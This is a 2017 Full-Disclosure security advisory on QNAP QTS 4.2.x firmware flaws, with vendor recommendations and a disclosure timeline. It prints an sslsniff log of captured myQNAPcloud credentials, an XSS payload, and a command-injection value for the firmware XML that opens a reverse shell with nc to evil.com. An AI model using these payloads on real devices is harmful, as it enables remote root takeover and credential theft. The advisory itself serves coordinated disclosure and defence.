lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 15 Feb 2017 14:31:23 +0200 (EET)
From: Harry Sintonen <sintonen@....fi>
To: fulldisclosure@...lists.org
Subject: [FD] QNAP QTS 4.2.x multiple vulnerabilities

QNAP QTS 4.2.x multiple vulnerabilities
=======================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/qnap-qts-42-multiple-vulnerabilities.txt


Overview
--------

QNAP QTS firmware contain Missing Transport Layer Security (CWE-319),
Improper Certificate Validation (CWE-295), Command Injection (CWE-77),
Cross-Site Scripting (CWE-79) and Information Exposure (CWE-200)
vulnerabilities that can be exploited to gain remote command execution
to the devices or to perform arbitrary administrative functions, and
to gain unauthorized access to user's myQNAPcloud credentials.


Description
-----------

QNAP QTS software firmware update functionality include Missing Transport
Layer Security (CWE-319), Command Injection (CWE-77) and Cross-Site
Scripting (CWE-79) vulnerabilities. An attacker in a privileged network
position can Man-in-The-Middle the firmware update check and exploit the
command injection vulnerability to execute arbitrary commands on the
targeted device.

QNAP QTS myQNAPcloud functionality includes Improper Certificate Validation
(CWE-295) vulnerability. The attacker in a privileged network position can
exploit this vulnerability to eavesdrop the myQNAPcloud credentials.

QNAP QTS media scraping functionality automatically scrapes Google and IMDB 
for media information (for example album cover images). The functionality
contains an Information Exposure (CWE-200) vulnerability. The attacker in a
privileged network position can eavesdrop the requests performed.


Impact
------

The attacker in a privileged network position is able to execute arbitrary
commands as administrative user (root). The attacker can also perform
any administrative functions normally available to the administrator, such
as firmware updates.

The attacker in a privileged network position is able to gain access to
the myQNAPcloud credentials. The attacker can access the NAS via the
myQNAPcloud APIs and/or the www.myqnapcloud.com website.

The attacker in a privileged network position is able gain knowledge of the
media files stored on the device.


Details
-------

The discovered vulnerabilities, described in more detail below, enable
multiple independent attacks described here in brief:

- Semi-Automated Remote Command Execution Via Firmware Update

   The vulnerabilities in QNAP QTS firmware update enable semi-automated
   remote command execution attacks against the QNAP firmware update
   functionality. The attack involves performing Man-in-The-Middle attack
   on the firmware update request. The exploit is triggered when the
   administrator logs on to the device, or when manual firmware update
   check is performed. The Cross-Site Scripting vulnerability enables
   attack automation, no other user interaction is needed.

- Stealing myQNAPcloud Credentials and/or Access Tokens

   The Improper Certificate Validation in the myQNAPcloud requests enable
   Man-in-The-Middle attack against the myQNAPcloud connections. The
   attacker will learn the myQNAPcloud user credentials and/or access
   tokens. These in turn can be leveraged to obtain access to the NAS
   contents.

- Media Information Exposure

   Missing Transport Layer Security and Improper Certificate Validation in
   the QTS media scraping functionality enable Man-in-The-Middle attack
   against the requests being performed. As a result, the attacker will
   gain knowledge about the media files stored on the device.


Vulnerabilities
---------------

1. Firmware Update Missing Transport Layer Security (CWE-319)

The QNAP QTS firmware release XML file is downloaded without transport
layer security (TLS). The content of the file can be tampered with. The
actual firmware updates are downloaded without transport layer security
(TLS), too. The attacker in a privileged network position can
Man-in-The-Middle the connection and tamper with the downloaded firmware
release XML and/or the firmware binaries.

NOTE: It is unclear if the firmware binaries are somehow signed. If no
signing is used, the firmware image can be replaced with any custom
content by the attacker.


2. myQNAPcloud Improper Certificate Validation (CWE-295)

The QNAP QTS connects to myQNAPcloud without proper certificate
validation. The attacker in a privileged network position can
Man-in-The-Middle the connection and steal the user credentials and/or
access tokens and other confidential information.

At least the following hosts are contacted without validation:
- account.myqnapcloud.com
- core2.api.myqnapcloud.com
- auth.api.myqnapcloud.com

The myQNAPclould service also connects back to the NAS. Even if this
connection is configured to use TLS only, again no certificate
validation is performed.

myQNAPcloud credential capture example:

# sslsniff -a -c /usr/share/sslsniff/certs/wildcard -s 4443 -w /dev/stdout
1485661482 INFO sslsniff : Added OCSP URL: ocsp.ipsca.com
1485661482 INFO sslsniff : Certificate Ready: *
sslsniff 0.8 by Moxie Marlinspike running...
1485661488 DEBUG sslsniff : Read from Client (api.myqnapcloud.com) :
POST /oauth/token HTTP/1.1
Host: auth.api.myqnapcloud.com
Accept: application/json
X-QNAP-APP-ID: 0vi23432423egfdsscwklkjdw23s9001
X-QNAP-SUBAPP-ID: 0vi23432423egfdsscwklkjdw23s9001
X-QNAP-MODEL: TVS-663
X-QNAP-FIRMWARE: 4.2.3_20170121
X-QNAP-DIGEST: 20[XXXXXXXXXXXXXXXXXXXXXXXXXX]0e
X-QNAP-APP-VER: 2.0.11
X-QNAP-DEVICE-HOSTNAME: NASSE
Content-Length: 191
Content-Type: application/x-www-form-urlencoded

grant_type=password&client_id=0vi23432423egfdsscwklkjdw23s9001&
client_secret=dlxkajKmomLqdBmvNfjVycvHjXjikeowUFYOPf43s&
username=email%40victim.com&password=mysecretpassword


3. Command Injection in Firmware Update (CWE-77)

/sbin/get_new_firmware binary has a command injection bug. The following
command is executed via popen():

/bin/ping -c 2 %s > /tmp/ping_reply ; /bin/cat /tmp/ping_reply | 
/bin/grep time | /bin/cut -d '=' -f 4 | /bin/cut -d ' ' -f 1 ; 
/bin/rm -f /tmp/ping_reply

The value inserted to %s is obtained from the 'server' element of the
downloaded firmware update XML file:

<?xml version="1.0" encoding="utf-8"?>
<docRoot>
         <storage>
                 <downloadServer>
                         <server>http://download.qnap.com/</server>
                         <server>http://eu1.qnap.com/</server>
                         <server>http://us1.qnap.com/</server>
                 </downloadServer>

By modifying the server parameter, arbitrary commands can be executed. For
example:

   <server>http://`nc -e\`echo -e '\x2fbin\x2fsh'\` evil.com 9999`</server>

Note that the string used in the ping command argument is terminated by a
slash (/) character, so the injected command cannot include it. This
limitation is trivial to bypass by encoding the character.


4. Cross-Site Scripting Via Firmware Update (CWE-79)

There are several Cross-Site Scripting vulnerabilities in the QNAP web user
interface.

When the QNAP web user interface notices a new firmware update it will pop
up a requester indicating that a new firmware update is available. The
"build number" is part of this message. Also the Event Notification for a
new firmware update will render the "build number" in a similar manner.

The displayed information is extracted from the downloaded firmware update
XML file. For example:

   <buildNumber>20160119</buildNumber>

The information displayed isn't encoded properly, leading to a Cross-Site
Scripting vulnerabilty. For example:

   <buildNumber>&lt;img src=x onerror=alert(1)&gt;&lt;/img&gt;</buildNumber>

These cross site scripting vulnerabilities can be leveraged to perform
arbitrary administrative operations available to the logged in user.


5. Information Exposure To 3rd Parties Via Media Scraping (CWE-200)

The QNAP QTS 'media' scraping functionality connects to
ajax.googleapis.com without proper certificate validation, and to
www.imdb.com and akas.imdb.com without transport layer security. An
attacker in a privileged network position can Man-in-The-Middle the
connections and learn the titles of the media files stored on the NAS.

The /mnt/ext/opt/medialibrary/lib/libscrap.so library performs insecure
TLS connections by enabling insecure mode (-k):

# strings libscrap.so | grep 'curl -k'
/sbin/curl -k -L '%s' --connect-timeout 30 --

The library also performs insecure connections to various sites without 
transport layer security:

# grep -oa 'http://[^/]*' libscrap.so
http://www.imdb.com
http://www.imdb.com
http://akas.imdb.com
http://akas.imdb.com
http://akas.imdb.com%s


Vulnerable devices
------------------

The vulnerabilities were discovered from an QNAP TVS-663, firmware version
4.2.0 Build 20160119. They're also confirmed to work with version 4.2.2
Build 20161214.

According to QNAP the vulnerabilities affect all QNAP products running QTS.


Recommendations to vendor
-------------------------

1. In custom openssl code validate the certificate chain by utilizing
    SSL_CTX_set_verify with mode SSL_VERIFY_PEER. Create a verify_callback
    hook that validates the certificate Common Name (CN) or Subject
    Alternative Names (SAN) against the intended target host name. In
    libcurl code do not disable CURLOPT_SSL_VERIFYPEER. Do not use -k/
    --insecure option with curl command. Do not use --no-check-certificate
    with wget.

2. Do not utilize internet APIs without transport layer security. Upgrade
    all internal QNAP APIs to use TLS. The old non-TLS QNAP APIs can remain
    functional to allow legacy QTS versions to access them.

3. Fix the command injection vulnerability by performing proper input
    validation (whitelisting) and/or shell metacharacter escaping, or by
    utilizing execl family of functions.

4. Fix the firmware update related Cross-Site Scripting vulnerabilities
    in the user interface by performing input validation and/or output
    HTML encoding.

5. Stop using the deprecated API
    https://ajax.googleapis.com/ajax/services/search/images?v=1.0


End user mitigation
-------------------

- Install the latest firmware update, version 4.2.3 build 20170213 or later.

- If you're worried about Scraping privacy issues use external
   firewall to block the QNAP device from accessing the following
   external sites:
      ajax.googleapis.com
      www.imdb.com
      akas.imdb.com


Credits
-------

The vulnerabilities were discovered by Harry Sintonen / F-Secure Oyj.


Timeline
--------

30.01.2016  discovered vulnerabilities 1, 3 and 4
31.01.2016  discovered vulnerabilities 2 and 5
31.01.2016  wrote a proof of concept exploit
01.02.2016  sent an advance notice to vendor regarding the vulnerabilities
01.02.2016  started to write a preliminary advisory
01.02.2016  sent the preliminary advisory to vendor
02.02.2016  sent the preliminary vulnerability report to CERT-FI
08.03.2016  sent a status inqury to vendor
14.03.2016  received a response from vendor about the status. agreed that
             disclosure should be coordinated. vendor representative agreed
             to contact me shortly regarding the fixes. communicated the
             deadline of 180 days from delivery of the initial advisory.
31.07.2016  no communication from vendor has occurred. sent advance notice
             to vendor regarding the planned disclosure date of 01.08.2016.
02.08.2016  vendor asked for 90 day extension. agreed to it.
02.11.2016  no fixes or updates arrived after 90 days.
21.11.2016  no word from vendor. asked if vendor needs even more time.
             reminded vendor that: "...the whole point of responsible
             disclosure is that vulnerabilities get fixed. Extended delay
             allows for other malicious parties to also find the vuls and
             exploit them."
24.11.2016  vendor requested yet another postponement. no schedule was
             given.
05.12.2016  informed the vendor of disclosure at Disobey 2017 on Jan 13th.
13.01.2017  dislosed vulnerabilities 1, 3 and 4 at Disobey 2017.
18.01.2017  vendor confirmed that all devices running QTS are vulnerable.
28.01.2017  vendor released QTS 4.2.3 and notified the author.
29.01.2017  QTS 4.2.3 fixed at least vulnerability 1. this is enough
             to block the firmware exploit. vulnerability 2 was confirmed
             to be unfixed. reported the status to the vendor. vendor
             requested until 15.02.2017 to fix vulnerability 2.
14.02.2017  vendor released QTS 4.2.3 Build 20170213 fixing vulnerability
             2.
15.02.2017  public release of the advisory.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ